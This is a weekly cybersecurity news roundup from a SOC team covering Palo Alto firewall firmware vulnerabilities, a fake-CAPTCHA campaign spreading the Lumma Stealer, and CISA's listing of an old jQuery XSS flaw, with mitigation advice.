Issue 50: Critical Palo Alto Firewall Flaws, Fake CAPTCHAs and jQuery XSS Exploit. Are You at Risk?

Top stories 31 Jan 2025:

• Critical Flaws Discovered in Palo Alto Firewalls
• Fake CAPTCHA Pages Fuel Global Attack Campaign
• CISA Adds Five-Year-Old jQuery XSS Flaw to KEV List

Welcome back to Critical Chatter. Your weekly round up of current cybersecurity threats, vulnerabilities and active exploits. Curated by your humble SOC team. ??

Critical Flaws Discovered in Palo Alto Firewalls

Security vendor Eclypsium found multiple vulnerabilities in Palo Alto Networks firewalls (PA-3260, PA-1410, and PA-415).? These flaws, collectively named PANdora's Box, could allow attackers to bypass Secure Boot and modify firmware.

?

Vulnerabilities include:

• BootHole (CVE-2020-10713), affecting all three models, enabling Secure Boot bypass.?
• Multiple SMM vulnerabilities (CVE-2022-24030, CVE-2021-33627, CVE-2021-42060, CVE-2021-42554, CVE-2021-43323, and CVE-2021-45970) affect the PA-3260, potentially leading to privilege escalation.
• LogoFAIL also affects the PA-3260, bypassing Secure Boot.
• PixieFail affects the PA-1410 and PA-415, potentially allowing code execution.
• An insecure flash access control vulnerability and CVE-2023-1017 affect the PA-415.
• An Intel bootguard bypass affects the PA-1410.

?

CloudGuard recommends:

Exploitation requires prior PAN-OS compromise and elevated privileges, this can be mitigated by upgrading to the latest version of PAN-OS.

Palo Alto Networks are working on firmware updates for the InsydeH2O vulnerabilities for affected models.

TLDR; Eclypsium discovered multiple vulnerabilities in Palo Alto firewalls that could allow attackers to bypass Secure Boot and exploit firmware. Users should upgrade to the latest PAN-OS version for mitigation.

Fake CAPTCHA Pages Fuel Global Attack Campaign

A new global malware campaign distributes the Lumma information stealer via fake CAPTCHA verification pages.?Netskope Threat Labs has tracked victims across multiple sectors, including healthcare, banking, marketing and telecoms, in countries such as Argentina, Colombia, the US and the Philippines.

The attack starts when victims visit a compromised site that redirects them to a counterfeit CAPTCHA page. Here, the user is instructed to copy and paste a command into the Windows Run prompt, which downloads and executes a malicious HTA file. This file then uses PowerShell to download and execute further payloads, ultimately deploying the Lumma Stealer.?The attacker also bypasses Windows Antimalware Scan Interface (AMSI) protections, making it harder for security tools to catch the attack.

Malware-as-a-Service (MaaS) is a business model under which cybercriminals provide access to malicious software and related infrastructure for a fee.

Lumma (a malware-as-a-service) has also been spread via fake Reddit and WeTransfer domains using a SelfAU3 Dropper, and similar tactics have pushed other stealers like Vidar.?A Phishing-as-a-Service toolkit, Tycoon 2FA, has also been updated with evasion techniques, including using compromised email accounts and anti-analysis measures.?

Gravatar profiles are also being abused in social engineering attacks to mimic legitimate services like AT&T, Comcast, Eastlink, Infinity, Kojeko, and Proton Mail for credential harvesting.

TLDR; A fake CAPTCHA campaign is distributing the Lumma Stealer malware across various sectors, using social engineering and malicious scripts to bypass security defences.

CISA Adds Five-Year-Old jQuery XSS Flaw to KEV List

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2020-11023 (CVSS: 6.1/6.9), a medium-severity cross-site scripting (XSS) vulnerability in jQuery, to its Known Exploited Vulnerabilities catalogue.?

This nearly five-year-old flaw allows arbitrary code execution if HTML containing <option> elements from untrusted sources is passed to jQuery's DOM manipulation methods, even after sanitisation.

The issue was first addressed in jQuery version 3.5.0, released in April 2020. For those still using older versions, CISA recommends sanitizing the HTML string with a tool like DOMPurify, which offers a workaround by using the SAFE_FOR_JQUERY flag before passing the HTML to jQuery methods.

?

The CISA advisory doesn’t go into specifics about the ongoing exploitation or identify the threat actors involved. But, there have been reports of attacks tied to advanced persistent threat (APT) groups like APT1 (Brown Fox, Comment Panda) and APT27 (Brown Worm, Emissary Panda. EclecticIQ also linked vulnerable jQuery versions to Ivanti appliance exploits.?

Federal Civilian Executive Branch (FCEB) agencies should remediate this flaw by 13 February 2025, in compliance with Binding Operational Directive (BOD) 22-01.

TLDR; CISA has added a medium-severity XSS vulnerability in jQuery to its Known Exploited Vulnerabilities list, warning of continued exploitation and recommending updates to address the flaw.

You may also be interested in...

?? Read it here: Unpacking what Microsoft’s agentic AI announcements mean for cybersecurity in 2025

That's all folks!

Thank you for reading Critical Chatter, CloudGuard’s weekly roundup of security articles curated by Guardians. This week’s news flash has been curated by Vaughan Carey (SOC Leader)

If you like what you've read, subscribe so you don't miss next week's roundup.